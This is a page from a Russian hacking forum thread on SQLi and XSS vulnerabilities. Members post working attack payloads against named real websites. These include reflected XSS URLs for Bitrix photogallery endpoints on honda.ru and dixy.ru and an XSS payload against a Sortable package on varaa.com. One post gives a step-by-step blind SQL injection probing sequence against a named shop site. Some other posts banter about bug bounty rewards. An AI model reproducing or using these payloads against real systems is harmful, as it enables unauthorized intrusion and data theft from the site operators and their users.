Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

Page 18 of 18
  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Code:
    https://honda.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
https://dixy.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
     
    #341 crlf, 12 Oct 2021
    CyberTro1n, erwerr2321, fandor9 and 5 others like this.
  2. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,233
    Likes Received:
    26,222
    Reputations:
    147
    Это по сути песочница. Один пейлоад стрелял сразу в нескольких местах:
    на ифраме-толока.ком и на sandbox.ифраме-толока.ком. Но там тоже ни кук, ни импэкта))
    Но было ещё и третье место, откуда он постреливал. :)
    И вот только вчера прилетело письмецо в конверте.

    yabbletter.png
     
    #342 erwerr2321, 21 Oct 2021
    Octavian, fandor9, eminlayer7788 and 2 others like this.
  3. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    А моя доля? На шаверму
     
    #343 Octavian, 24 Oct 2021
  4. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,233
    Likes Received:
    26,222
    Reputations:
    147
    Шта? :eek:
    Я её намного раньше тебя запостил! я ж писал тебе tracking ID и time 1619951822533
    Ни гани!
     
    #344 erwerr2321, 24 Oct 2021
    Last edited: 24 Oct 2021
    Octavian likes this.
  5. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    183
    Likes Received:
    56
    Reputations:
    2
    #345 eminlayer7788, 1 Nov 2021
    crlf and Baskin-Robbins like this.
  6. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    183
    Likes Received:
    56
    Reputations:
    2
    del
     
    #346 eminlayer7788, 18 Nov 2021
    Last edited: 22 Sep 2022
  7. ZeV$

    ZeV$ Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    40
    Likes Received:
    10
    Reputations:
    3
    digging blind sqli
    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'a%') AND '9'='9
    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'b%') AND '9'='9
    ...
    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'n%') AND '9'='9


    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 2) AND '9'='9
    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 333) AND '9'='9
     
    #347 ZeV$, 25 Nov 2021
  8. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    #348 Octavian, 19 Feb 2022
  9. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    183
    Likes Received:
    56
    Reputations:
    2
    #349 eminlayer7788, 23 Jun 2022
    Baskin-Robbins and crlf like this.
  10. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    183
    Likes Received:
    56
    Reputations:
    2
    #350 eminlayer7788, 14 Oct 2022
    crlf likes this.
  11. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    XSS в библиотеке Sortable работает только в IE
    Code:
    https://varaa.com/packages/sortable/??"><img/src/onerror=alert(document.domain)>
     
    #351 Octavian, 24 Oct 2022
    joelblack, crlf and Suicide like this.
  12. CyberTro1n

    CyberTro1n Well-Known Member

    Joined:
    20 Feb 2016
    Messages:
    1,034
    Likes Received:
    804
    Reputations:
    4

    Attached Files:

    #352 CyberTro1n, 26 Mar 2024
    Last edited: 26 Mar 2024
(You must log in or sign up to post here.)
Page 18 of 18
Loading...
Similar Threads - Уязвимости SQLi
  1. zase

    массовый взлом сайтов

    zase, 25 Dec 2022, in forum: Песочница
    Replies:
    1
    Views:
    2,869
    lifescore
    14 Jan 2023
  2. Shadows_God

    Взлом сайтов

    Shadows_God, 20 Nov 2022, in forum: Песочница
    Replies:
    12
    Views:
    5,743
    u_r_an_1d10t
    18 Dec 2022
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.